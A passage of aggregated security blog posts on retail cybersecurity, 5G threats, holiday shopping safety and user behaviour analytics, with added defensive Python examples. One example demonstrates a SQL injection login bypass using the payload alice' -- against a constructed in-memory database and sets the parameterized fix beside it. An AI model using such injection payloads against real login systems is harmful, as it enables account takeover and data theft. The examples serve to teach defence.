Account takeover (ATO), which occurs when a threat actor gains unauthorized access to an online account that belongs to someone else, can also affect e-commerce customers. With access to shoppers’ accounts, fraudsters can wreak havoc by stealing stored payment data, making fraudulent purchases and rerouting existing orders to a different address, for example.

Unauthorized access requires legitimate credentials, which criminals obtain through a variety of tactics. The most common are phishing, brute-forcing weak passwords and SQL injection against the web application itself, which can expose the credential store directly.

You can help mitigate these threats by practicing good network hygiene. Here are some useful tips retailers can apply today to lower the risk of user account compromises:

  • Apply current patches to all hardware and to internal and external software, including the stacks that implement your network and database security protocols.
  • Use parameterized queries and validate user input to prevent injection attacks; sanitizing input on its own is not a sufficient defense against SQL injection.
  • Prioritize patching for the threats most relevant to your organization. Watch the most-exploited vulnerabilities and ensure that internet-facing servers and systems are up to date.
  • Always consult your local computer emergency response team (CERT), IBM X-Force Exchange and other threat intelligence sources to gather the latest news on vulnerabilities and mitigation techniques.
  • Enforce multifactor authentication (MFA) for employees, and offer it to customers whose accounts store payment data.
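To make the injection point concrete, here is an added example (not code from the article) of a login check built by string concatenation beside the parameterized version, using Python’s sqlite3 module on an in-memory database. The user table, the account and the payload are constructed for the example, and the unsalted SHA-256 password hash is a shortcut to keep the demo short, not a recommendation (use a slow, salted KDF such as bcrypt or Argon2 in production).

```python
"""SQL injection login bypass beside its parameterized fix (added example, sqlite3, in-memory)."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with one constructed account (unsalted hash: demo shortcut only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("alice", hashlib.sha256(b"correct horse battery staple").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: attacker-controlled text is parsed as SQL syntax."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (
        "SELECT 1 FROM users WHERE username = '" + username + "' "
        "AND pw_hash = '" + pw_hash + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: values are bound by the driver and can never become SQL."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND pw_hash = ?", (username, pw_hash)
    ).fetchone()
    return row is not None


def demo() -> dict:
    """Run the legitimate login and the injected one against both implementations."""
    conn = make_db()
    # The trailing '--' turns the rest of the string-built query into a comment,
    # so the password check disappears and the row for alice is returned.
    payload = "alice' --"
    return {
        "vuln_legit": login_vulnerable(conn, "alice", "correct horse battery staple"),
        "vuln_injected": login_vulnerable(conn, payload, "anything"),
        "safe_legit": login_safe(conn, "alice", "correct horse battery staple"),
        "safe_injected": login_safe(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

The parameterized version rejects the payload because the driver sends the literal string alice' -- as the username value; no escaping or sanitizing routine is involved, which is why it is the primary defense rather than a complement to one.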

3. Go to Your Separate Corners

Cybercriminals are always leveraging new ways to steal payment card data and correlate it with PII. Elevated volumes of web traffic during the holiday season provide attackers with even more targets and opportunities.

To help keep customer data safe, even in cases where criminals manage to infiltrate assets, security teams should keep PII, financial data and POS information separate by segmenting enterprise networks. By keeping this information separated and encrypted, attackers will find it much harder to correlate data on customers. While segmenting a network can be an intensive process, it’s a small price to pay to keep customer data safe.

When segmenting, restrict cross-segment communication to an explicit allow-list of source and destination addresses and ports, so that any other traffic crossing a boundary is suspicious by definition and can be logged and alerted on. An attacker can spoof a source address, but an attacker who is not on the path of the reply traffic cannot complete a TCP handshake with a spoofed source, so this control still exposes most intruders rather easily. Here are some other best practices to consider:

  • Conduct internal audits for segment crossover to ensure that segregated data sets do not get mixed over time and turn up elsewhere on the network, where they could help attackers with identity theft.
  • Deploy web application firewalls (WAFs) to filter, monitor and block traffic to and from web applications, mitigating threats such as cross-site scripting (XSS) and SQL injection.
  • As a secondary measure, a network firewall should govern all traffic entering and leaving the network. Configuration determines a firewall’s effectiveness and should be performed by a certified network technician.
  • Have administrators log in with a standard, lower-privilege account and elevate only for the updates and maintenance that require it.
  • Prevent systems that handle card data or PII, and the accounts that administer them, from communicating directly with the internet.
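The segment-crossover audit in the first bullet can be run against flow records exported from your firewalls or switches. The following added example (not the article’s code) classifies each flow by source and destination segment and reports every boundary crossing that has no entry in an explicit allow-list, which also catches a card-data host talking directly to the internet. The segment map, allow-list and flow records are hypothetical and constructed here; the audit trusts the source address in each record, so pair it with anti-spoofing filtering at the segment boundaries.

```python
"""Audit flow records for cross-segment traffic the segmentation policy does not allow (added example)."""
import ipaddress
from typing import List

# Constructed segment map; the addressing is hypothetical.
SEGMENTS = {
    "POS": ipaddress.ip_network("10.10.0.0/24"),     # terminals and the card-data environment
    "PII_DB": ipaddress.ip_network("10.30.0.0/24"),  # customer records
    "CORP": ipaddress.ip_network("10.20.0.0/16"),    # back-office workstations
    "DMZ": ipaddress.ip_network("192.0.2.0/24"),     # web and gateway proxies (TEST-NET-1 as stand-in)
}

# Every permitted boundary crossing as (source segment, destination segment, destination port).
ALLOWED_CROSSINGS = {
    ("POS", "DMZ", 443),       # terminals talk only to the payment gateway proxy
    ("CORP", "PII_DB", 5432),  # back-office application to the customer database
    ("DMZ", "PII_DB", 5432),   # web tier to the customer database
}

# Constructed flow records: timestamp, source, destination, destination port.
SAMPLE_FLOWS = """\
2018-11-20T10:00:01 10.10.0.5 192.0.2.10 443
2018-11-20T10:00:07 10.20.3.14 10.30.0.20 5432
2018-11-20T10:00:09 10.10.0.5 203.0.113.9 443
2018-11-20T10:00:12 10.10.0.7 10.30.0.20 5432
2018-11-20T10:00:15 10.20.3.14 10.20.3.15 445
2018-11-20T10:00:20 192.0.2.10 10.10.0.5 22
"""


def segment_of(ip: str) -> str:
    """Name of the segment containing ip; anything outside the map is treated as external."""
    addr = ipaddress.ip_address(ip)
    for name, net in SEGMENTS.items():
        if addr in net:
            return name
    return "EXTERNAL"


def parse_flows(text: str) -> List[dict]:
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst, dport = line.split()
        flows.append({"ts": ts, "src": src, "dst": dst, "dport": int(dport)})
    return flows


def audit(flows: List[dict]) -> List[dict]:
    """Return every flow that crosses a segment boundary without an allow-list entry."""
    findings = []
    for flow in flows:
        src_seg, dst_seg = segment_of(flow["src"]), segment_of(flow["dst"])
        if src_seg == dst_seg:
            continue  # intra-segment traffic is out of scope for this check
        if (src_seg, dst_seg, flow["dport"]) in ALLOWED_CROSSINGS:
            continue
        findings.append({**flow, "src_seg": src_seg, "dst_seg": dst_seg})
    return findings


if __name__ == "__main__":
    for f in audit(parse_flows(SAMPLE_FLOWS)):
        print(f"{f['ts']} {f['src_seg']}->{f['dst_seg']} "
              f"{f['src']} -> {f['dst']}:{f['dport']} NOT ALLOWED")
```

On the sample data the audit reports a terminal reaching an external host, a terminal querying the customer database directly, and an SSH connection from the DMZ into the POS segment; the gateway traffic and the back-office database access pass because they are on the allow-list.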

4. Learn From History and Educate Users

Nearly every company has some kind of data protection training in place. To make it effective, organizations must recognize that employees often click through training materials as fast as possible to get back to work. So how can an organization educate its users effectively?

  • Plan for role-based training of all employees in the organization.
  • Train employees on both physical and digital security.
  • Conduct short training sessions and field-test them by asking for employee feedback.
  • Launch an internal phishing campaign: Send a spoofed email from a dummy account with official-sounding names, titles and subjects, and track the number of users who click on the links or attachments. Offer additional training according to the conclusions from the campaign.
  • Identify users who need remedial training and retest as needed.
  • Most importantly, provide all users with an easily accessible resource to report issues. Users should be able to contact IT security with any question or suspicion.

For education to be effective, it has to be repetitive and stay top-of-mind for users across the entire organization. Get management to support awareness campaigns and find opportunities to educate users. Having vigilant employees makes mitigating attacks during the holiday season that much more effective. Frequent email reminders, illustrative posters and communicating best practices during team meetings can demonstrate your organization’s commitment to secure day-to-day conduct. Giving users personalized attention can go a long way toward making the message resonate with them — for example, you might consider gifting a security-themed mug for the holiday season.

5. Use Network IP Whitelists and Blacklists

A whitelist names the IP addresses or domains that are explicitly permitted to connect; a blacklist names those that are to be blocked from entering the network. Used together, they keep authorized connections in and unauthorized ones out, in both directions. Keeping the lists current demands some diligence, but they can be crucial to boosting network security.

Filtering by these lists suits enterprises that do not run e-commerce, since an online store has to accept inbound requests from all over the world, especially during the holiday shopping season. For such sites a blacklist of known-bad sources still applies, but an inbound whitelist does not.

These lists are much easier to maintain for networks without external customers, because a blacklist can then be enforced on both inbound and outbound access to stop known malicious hosts from reaching the organization’s data and assets. Below are some basic tips for filtering hosts:

  • Blacklist any IP addresses known to be malicious. Continuously updated lists can be fed into security tooling directly from threat intelligence platforms.
  • If a blacklisted IP address has a legitimate reason to communicate with the network, investigate, confirm and then permit it through an explicit whitelist entry.
  • Whitelists should include all internal company address ranges.
  • Whitelists of outbound destinations should exclude websites that employees do not need for their daily tasks (e.g., social media, webmail).
  • Verify both lists periodically to ensure that every entry is still accurate.
  • Any whitelisted IP address that becomes outdated should be promptly removed, or moved to the blacklist if warranted.
  • Never let an address appear on both lists; keeping allowed and banned IP addresses from intermingling is the basic premise of effective whitelist/blacklist practice.
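The following added example (not from the article) shows these rules as code, keeping the article’s whitelist/blacklist terminology: it parses entries given as CIDR ranges, reports any network listed on both (the intermingling the last bullet warns about), flags entries that have not been re-verified recently, and resolves a lookup by longest matching prefix so that a /32 exception on the whitelist can override a broader blacklisted range, while a tie between equally specific entries fails closed. The entries, their verification dates and the 90-day staleness threshold are assumptions constructed for the example.

```python
"""Whitelist/blacklist evaluator with conflict, staleness and longest-prefix checks (added example)."""
import ipaddress
from datetime import date
from typing import List, Optional, Tuple

# Constructed entries as (network, date last verified). Real lists come from your asset
# inventory and threat-intelligence feeds; the public addresses here are documentation ranges.
WHITELIST = [
    ("10.0.0.0/8", date(2018, 11, 1)),        # internal address space
    ("203.0.113.40/32", date(2018, 11, 15)),  # payment partner host: an explicit exception
]
BLACKLIST = [
    ("203.0.113.0/24", date(2018, 11, 10)),   # feed-reported scanning range
    ("198.51.100.7/32", date(2018, 3, 2)),    # not re-verified for months
    ("10.0.0.0/8", date(2018, 11, 1)),        # copied onto both lists by mistake
]


def parse_entries(raw: List[Tuple[str, date]]) -> List[Tuple[ipaddress.IPv4Network, date]]:
    """Reject malformed entries early: strict=True refuses a prefix with host bits set."""
    return [(ipaddress.ip_network(net, strict=True), seen) for net, seen in raw]


def find_conflicts(whitelist, blacklist) -> List[str]:
    """Networks listed identically on both lists; resolve these, do not rely on ordering."""
    allowed = {net for net, _ in whitelist}
    return sorted(str(net) for net, _ in blacklist if net in allowed)


def find_stale(entries, today_iso: str, max_age_days: int = 90) -> List[str]:
    """Entries whose last verification is older than max_age_days as of today_iso."""
    today = date.fromisoformat(today_iso)
    return [str(net) for net, seen in entries if (today - seen).days > max_age_days]


def decide(ip: str, whitelist, blacklist) -> Tuple[str, Optional[str]]:
    """Longest matching prefix wins: a /32 whitelist exception beats a /24 block, and a /32
    block beats a /8 allow. Equally specific entries on both lists resolve to deny (fail closed)."""
    addr = ipaddress.ip_address(ip)
    verdict, matched, best_len = "no-match", None, -1
    for label, entries in (("allow", whitelist), ("deny", blacklist)):
        for net, _ in entries:
            if addr not in net:
                continue
            if net.prefixlen > best_len or (net.prefixlen == best_len and label == "deny"):
                verdict, matched, best_len = label, str(net), net.prefixlen
    return verdict, matched


if __name__ == "__main__":
    allow, deny = parse_entries(WHITELIST), parse_entries(BLACKLIST)
    print("conflicts:", find_conflicts(allow, deny))
    print("stale blacklist entries:", find_stale(deny, "2018-11-20"))
    for probe in ("203.0.113.40", "203.0.113.41", "10.1.2.3", "8.8.8.8"):
        print(probe, "->", decide(probe, allow, deny))
```

The "no-match" verdict is deliberately left to the caller: an inbound filter on a non-customer-facing network would treat it as deny, whereas an outbound filter might treat it as allow, and that policy decision should be explicit rather than buried in the lookup.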

Stay Tuned for More Holiday Season Tips for Retailers

There is no such thing as unimportant data. Take every necessary precaution to help protect enterprise and customer data by implementing strong retail cybersecurity controls, educating users and following current best practices. Maintaining customer confidence in your ability to protect their PII can result in more business, increased customer loyalty and stronger organizational reputation.

Stay tuned for five more tips to help retailers stay secure this holiday season.

The post 5 Recommendations to Improve Retail Cybersecurity This Holiday Season appeared first on Security Intelligence.

Who’s the Weakest Link in Your Supply Chain?

Nearly 60% of organizations have suffered data breaches resulting from a third party, as suppliers pose a growing risk to enterprise security. Do you know how many third parties your

The post Who’s the Weakest Link in Your Supply Chain? appeared first on The Cyber Security Place.

Professionally Evil Insights: Spring Break without Breaking the Bank: Hands On Training

Over the last eight years, one of the main focuses of Secure Ideas has been education.  One responsibility we take very seriously is that of growing the skills within our clients and the public, with the objective of raising the bar in security.  This mindset and core passion of Secure Ideas is because we all believe that we stand on the shoulders of giants. As each of us has grown into the roles we currently hold, we were not only shaped and developed by our own experiences, but also by the knowledge shared by others.  This desire to learn and grow is one of the main things that make me proud to be a part of the security community.

However, there are a couple of significant problems with our industry:  First, information security needs are growing faster than skilled personnel are learning.  Second, the cost of training has increased outrageously over the past decade.

The first issue has been discussed for almost as long as I have been involved in information security.  Even Alan Paller of the SANS Institute has been speaking about the skills gap for over a decade!  The second issue is even worse as it makes it harder to fix the first.  Training costs for a single class often exceed $5000 without even factoring in travel and the time away from work. So how do we fix this?

At Secure Ideas, we have decided that it is our responsibility as active practitioners to help fix this lack of affordable training and help address the skills gap.  To that end, we are committed to the following for 2019:

  1. First, we want to announce our Professionally Evil Spring Break event.  This 3-day event will host two classes: Professionally Evil Network Security and Professionally Evil Application Security.  The first focuses on network penetration testing and the second on application security and assessments. Either class is only $750, discounted to an early bird price of $600 until January 18, 2019.  Moreover, veterans, active duty military and first responders get either for 50% off.
  2. Second, our Secure Ideas Training site has recorded classes starting at $25 each and vets get them for free!  And our webcasts will continue to be run as often as we can.
  3. Third, we will continue to support and release our open-source training products such as SamuraiWTF and the Professionally Evil Web Penetration Testing 101 course.

We hope that together we can all help increase the skills of our industry and provide affordable training for all.  Let us know if you have any questions or if you would like us to run a private training for your organization.




What is the challenge in embracing multi-factor authentication?

Only 20% of IBM mainframe customers are embracing multi-factor authentication to protect data and applications, according to findings from a new poll of 81 mainframe users conducted by Macro 4

The post What is the challenge in embracing multi-factor authentication? appeared first on The Cyber Security Place.

How to Prepare for the Coming 5G Security Threats

Over the next few years, the pace of business will accelerate exponentially. 5G will enable the future enterprise technologies everyone is predicting and waiting for: fleets of self-driving delivery trucks, virtual (VR) and augmented reality (AR), and a world of enterprise Internet of Things (IoT) deployments — systems that will define an era that the World Economic Forum termed the “Fourth Industrial Revolution.” But do we understand the 5G security threats to come?

5G will provide super-high data rates, better quality of service and very low latency through dense base station deployments. As a result, we’ll likely depend on 5G far more than we ever did previous communications systems. Factories, businesses and critical infrastructure will all rely on 5G data connectivity, and this technology will transform business models and network infrastructures.

However, it’s important to note that this increased dependency on communications networks will also entail a greater capacity for disaster should they be compromised.

What Are the Greatest 5G Security Threats?

In a paper titled “A Formal Analysis of 5G Authentication,” researchers from ETH Zurich, the University of Lorraine and the University of Dundee warned that 5G could usher in a new era of security threats. In a nutshell, they found that 5G presents new risks because:

  • It’s an immature and insufficiently tested set of technologies;
  • It enables the movement and access of vastly higher quantities of data, and thus broadens attack surfaces; and
  • We will depend on it more than 4G for mission-critical applications.

With the rapid growth and change expected to come, what we don’t know very well may hurt us.

Check the Research

Like 3G and 4G networks, the current 5G standard relies on the Authentication and Key Agreement (AKA) protocol, by which a subscriber’s USIM and the network authenticate each other and derive the keys that protect subsequent traffic. The researchers formally modeled the 5G AKA protocol and found at least two significant weaknesses. First, it allows one malicious user to shift usage charges to another user. Second, it is possible to detect nearby phones, which enables tracking of other users.

The 5G standard should be updated as soon as possible to prevent threat actors from exploiting these flaws.

Consider the SOC

Meanwhile, the frontline experts — information security teams, IT security specialists, security operations center (SOC) leaders — should be concerned about 5G because of its unique properties. In the real world, 5G represents higher costs than 4G networks for new equipment, plus unknown costs of integrating 4G and 5G systems. That stresses budgets, and enterprise leaders could put pressure on IT teams to favor 5G rollouts and possibly skimp on addressing security issues in the 5G network — a line item already hard fought for in many organizations.

Higher 5G throughput also connects a vastly larger attack surface to more mission-critical applications. There are more potential entry points, and the consequences of an attack grow in proportion. Enabled by 5G, the number of IoT devices alone is expected to rise from 7 billion today to 21.5 billion by 2025, according to IoT Analytics. That expands the attack surface for such devices enormously, and the capacity for distributed denial-of-service (DDoS) attacks, cryptojacking and other compromises could grow with it.

How to Cultivate a 5G State of Mind

Although 5G is new and will usher in entirely new models for how things get done, it must be built on a solid foundation of network security. Many of the risks will lie in the scale and type of new 5G-enabled categories of infrastructure. IoT security is a known problem with known solutions. 5G will magnify whatever insecurity exists in processes, procedures and policies for IoT, and protections must scale up in proportion.

5G will enable entirely new services, and the costs for securing these services must be accounted for. 5G will be expensive, the new services will be expensive and the security to make it all happen will also be expensive. Don’t skimp on one area to pay for the other; deploy 5G securely or don’t deploy it at all.

Pressure to rush headlong into 5G deployments will come from every direction. But smart deployments will go slowly, building the foundation in advance of the new infrastructure with endpoint management solutions powered by artificial intelligence that can monitor the expanding attack surface as no human can do alone.

You’ll continue to hear about how much more secure 5G is than 4G. Don’t let the hype and excitement breed complacency. 5G is a brave new world for business, but also for threat actors. Although 5G represents a plethora of possibilities, we must build the future on a familiar foundation of secure networks and best practices. Improve existing networks first, and roll out individual 5G services over time and with care to make the best of the coming revolution.

The post How to Prepare for the Coming 5G Security Threats appeared first on Security Intelligence.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar shows “HTTP” instead of “HTTPS”, do not purchase from the site. As of July 2018, browsers such as Chrome label every plain-HTTP page “Not Secure”, which is very helpful to shoppers. A locked padlock icon also appears to the left of the URL in the address bar, or in the status bar below, depending on your browser. Keep in mind that the padlock only means the connection is encrypted; a fraudulent site can have one too, so check the domain name itself. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL, its design and its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.




Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent?

How businesses are building firewalls is changing. We’re seeing a continued trend toward smaller firewall boundaries and micro-segmentation to support zero-trust strategies, although it can be very piecemeal. As businesses

The post Managing Firewalls in the Cloud: do Companies Know Enough About Security Intent? appeared first on The Cyber Security Place.

What Are The Black Friday Security Threats And How Can Organisations Avoid Them?

As Black Friday approaches, what are the security threats and how can organisations and consumers avoid them? Black Friday, and the following Cyber Monday, represent that time of year when

The post What Are The Black Friday Security Threats And How Can Organisations Avoid Them? appeared first on The Cyber Security Place.

Nine In Ten SMBs Suffering Wi-Fi Issues

Mesh Wi-Fi could solve their problems, but many businesses don’t know what that is. If your Wi-Fi has prevented you from getting your job done on at least one occasion,

The post Nine In Ten SMBs Suffering Wi-Fi Issues appeared first on The Cyber Security Place.

Mirai Used as Payload in Hadoop YARN Vulnerability

A Mirai variant has been discovered targeting unpatched Linux servers, shifting the use of the malicious payload beyond the internet of things (IoT), according to new research from NETSCOUT ASERT.

The post Mirai Used as Payload in Hadoop YARN Vulnerability appeared first on The Cyber Security Place.

Access to Thousands of Breached Sites Found on Underground Market

By Vitali Kremez, Director of Research at Flashpoint. Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of

The post Access to Thousands of Breached Sites Found on Underground Market appeared first on The Cyber Security Place.

Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform

Last year, a cybersecurity manager at a bank near me brought in a user behavior analytics (UBA) solution based on a vendor’s pitch that UBA was the next generation of security analytics. The company had been using a security information and event management (SIEM) tool to monitor its systems and networks, but abandoned it in favor of UBA, which promised a simpler approach powered by artificial intelligence (AI).

One year later, that security manager was looking for a job. Sure, the UBA package did a good job of telling him what his users were doing on the network, but it didn’t do a very good job of telling him about threats that didn’t involve abnormal behavior. I can only speculate about what triggered his departure, but my guess is it wasn’t pretty.

UBA hit the peak of the Gartner hype cycle last year around the same time as AI. The timing isn’t surprising given that many UBA vendors tout their use of machine learning to detect anomalies in log data. UBA is a good application of SIEM, but it isn’t a replacement for it. In fact, UBA is more accurately described as a cybersecurity application that rides on top of SIEM — but you wouldn’t know that the way it’s sometimes marketed.

User Behavior Analytics Versus Security Information and Event Management

While SIEM and UBA do have some similar features, they perform very different functions. Most SIEM offerings are essentially log management tools that help security operators make sense of a deluge of information. They are a necessary foundation for targeted analysis.

UBA is a set of algorithms that analyze log activity to spot abnormal behavior, such as repeated login attempts from a single IP address or large file downloads. Buried in gigabytes of data, these patterns are easy for humans to miss. UBA can help security teams combat insider threats, brute-force attacks, account takeovers and data loss.

UBA applications require data from an SIEM tool and may include basic log management features, but they aren’t a replacement for a general-purpose SIEM solution. In fact, if your SIEM system has anomaly detection capabilities or can identify whether user access activity matches typical behavior based on the user’s role, you may already have UBA.

Part of the confusion comes from the fact that, although SIEM has been around for a long time, there is no one set of standard features. Many systems are only capable of rule-based alerting or limited to canned rules. If you don’t have a rule for a new threat, you won’t be alerted to it.
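To make the distinction concrete, the following is an added example (not code from the article): a canned SIEM rule for the brute-force pattern described above, beside a UBA-style baseline that flags a user whose download volume departs from that user's own history, a threat no rule was written for. Every event, user name, address and threshold is constructed for the example.

```python
"""Canned SIEM rule beside a UBA-style behaviour baseline, run over constructed log events.

The rule fires only on the pattern it was written for (repeated failed logins from
one source IP); the baseline flags a user whose download volume is an outlier against
that user's own history, which no rule covers. All data below is constructed.
"""
from collections import defaultdict
from statistics import mean, pstdev

FAILED_LOGIN_THRESHOLD = 5   # constructed rule threshold
Z_THRESHOLD = 3.0            # constructed anomaly threshold (standard deviations)

# Constructed events: (timestamp, user, source IP, action, bytes transferred).
HISTORY = [
    ("2018-11-12T09:10", "alice", "10.0.0.5", "download", 1_000_000),
    ("2018-11-13T09:12", "alice", "10.0.0.5", "download", 1_100_000),
    ("2018-11-14T09:08", "alice", "10.0.0.5", "download", 900_000),
    ("2018-11-15T09:15", "alice", "10.0.0.5", "download", 1_200_000),
    ("2018-11-16T09:11", "alice", "10.0.0.5", "download", 1_000_000),
    ("2018-11-12T10:00", "bob", "10.0.0.8", "download", 48_000_000),
    ("2018-11-13T10:02", "bob", "10.0.0.8", "download", 52_000_000),
    ("2018-11-14T10:01", "bob", "10.0.0.8", "download", 50_000_000),
    ("2018-11-15T10:05", "bob", "10.0.0.8", "download", 49_000_000),
    ("2018-11-16T10:03", "bob", "10.0.0.8", "download", 51_000_000),
]
TODAY = [
    ("2018-11-19T09:09", "alice", "10.0.0.5", "login_ok", 0),
    ("2018-11-19T09:30", "alice", "10.0.0.5", "download", 40_000_000),  # ~40x her usual
    ("2018-11-19T10:01", "bob", "10.0.0.8", "login_ok", 0),
    ("2018-11-19T10:04", "bob", "10.0.0.8", "download", 53_000_000),    # within bob's norm
] + [
    ("2018-11-19T11:%02d" % i, "admin", "10.0.0.9", "login_fail", 0) for i in range(6)
]


def siem_failed_login_rule(events, threshold=FAILED_LOGIN_THRESHOLD):
    """Canned SIEM rule: source IPs with `threshold` or more failed logins.
    It knows nothing about downloads, so alice's 40 MB pull is invisible to it."""
    failures = defaultdict(int)
    for _, _, src_ip, action, _ in events:
        if action == "login_fail":
            failures[src_ip] += 1
    return sorted(ip for ip, count in failures.items() if count >= threshold)


def daily_download_bytes(events):
    """Per-(user, day) download volume: the behavioural feature the baseline is built on."""
    totals = defaultdict(int)
    for ts, user, _, action, nbytes in events:
        if action == "download":
            totals[(user, ts[:10])] += nbytes
    return totals


def uba_download_anomalies(history, today, z_threshold=Z_THRESHOLD, min_days=3):
    """Flag users whose download volume today is an outlier against their own history.
    Returns {user: z-score}; users with too little history are skipped, not guessed."""
    per_user = defaultdict(list)
    for (user, _), total in daily_download_bytes(history).items():
        per_user[user].append(total)
    flagged = {}
    for (user, _), total in daily_download_bytes(today).items():
        baseline = per_user.get(user, [])
        if len(baseline) < min_days:
            continue
        mu, sigma = mean(baseline), pstdev(baseline)
        if sigma == 0:  # perfectly flat history: treat 10% of the mean as one sigma
            sigma = max(mu * 0.1, 1.0)
        score = (total - mu) / sigma
        if score > z_threshold:
            flagged[user] = round(score, 1)
    return flagged


def run_detectors(history, today):
    """What the SOC would see: the rule's hits and the baseline's hits, side by side."""
    return {
        "siem_rule_brute_force": siem_failed_login_rule(today),
        "uba_volume_anomaly": uba_download_anomalies(history, today),
    }


if __name__ == "__main__":
    for name, hits in run_detectors(HISTORY, TODAY).items():
        print(f"{name}: {hits}")
```

Note that the baseline needs the history that a log manager keeps; that is the sense in which the analytics ride on top of the SIEM rather than replace it.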

Analytical applications such as UBA are intended to address certain types of cybersecurity threat detection and remediation. Choosing point applications without a unified log manager creates silos of data and taxes your security operations center (SOC), which is probably short-staffed to begin with. Many UBA solutions also require the use of software agents, which is something every IT organization would like to avoid.

Start With a Well-Rounded SIEM Solution

A robust, well-rounded SIEM solution should cross-correlate log data, threat intelligence feeds, geolocation coordinates, vulnerability scan data, and both internal and external user activity. When combined with rule-based alerts, an SIEM tool alone is sufficient for many organizations. Applications such as UBA can be added on top for more robust reporting.

Gartner’s latest “Market Guide for User and Entity Behavior Analytics” forecast significant disruption in the market. Noting that the technology is headed downward into Gartner’s “Trough of Disillusionment,” researchers explained that some pure-play UBA vendors “are now focusing their route to market strategy on embedding their core technology in other vendors’ more traditional security solutions.”

In my view, that’s where it belongs. User behavior analytics is a great technology for identifying insider threats, but that’s a use case, not a security platform. A robust SIEM tool gives you a great foundation for protection and options to grow as your needs demand.

The post Why User Behavior Analytics Is an Application, Not a Cybersecurity Platform appeared first on Security Intelligence.

What Parents Need to Know About Live-Stream Gaming Sites Like Twitch

Clash of Clans, Runescape, Fortnite, Counter Strike, Battlefield V, and Dota 2. While these titles may not mean much to those outside of the video gaming world, they are just a few of the wildly popular games thousands of players are live streaming to viewers worldwide this very minute. However, with all the endless hours of entertainment this cultural phenomenon offers tweens, teens, and even adults, it also comes with some risks attached.

The What

Each month more than 100,000 people log onto sites like Twitch and YouTube to watch gamers play. Streamers, also called twitchers, broadcast their gameplay live online while others watch and participate through a chat feature. Each gamer attracts an audience (a few dozen to hundreds of thousands daily) based on his or her skill level and the kind of commentary and interaction with viewers they offer.

Reports state that video game streaming can attract more viewers than some of cable’s most popular television shows.

The Why

Ask any streamer (or viewer) why they do it, and many will tell you it’s to showcase and improve their skills and to be part of a community of people who are equally as passionate about gaming.


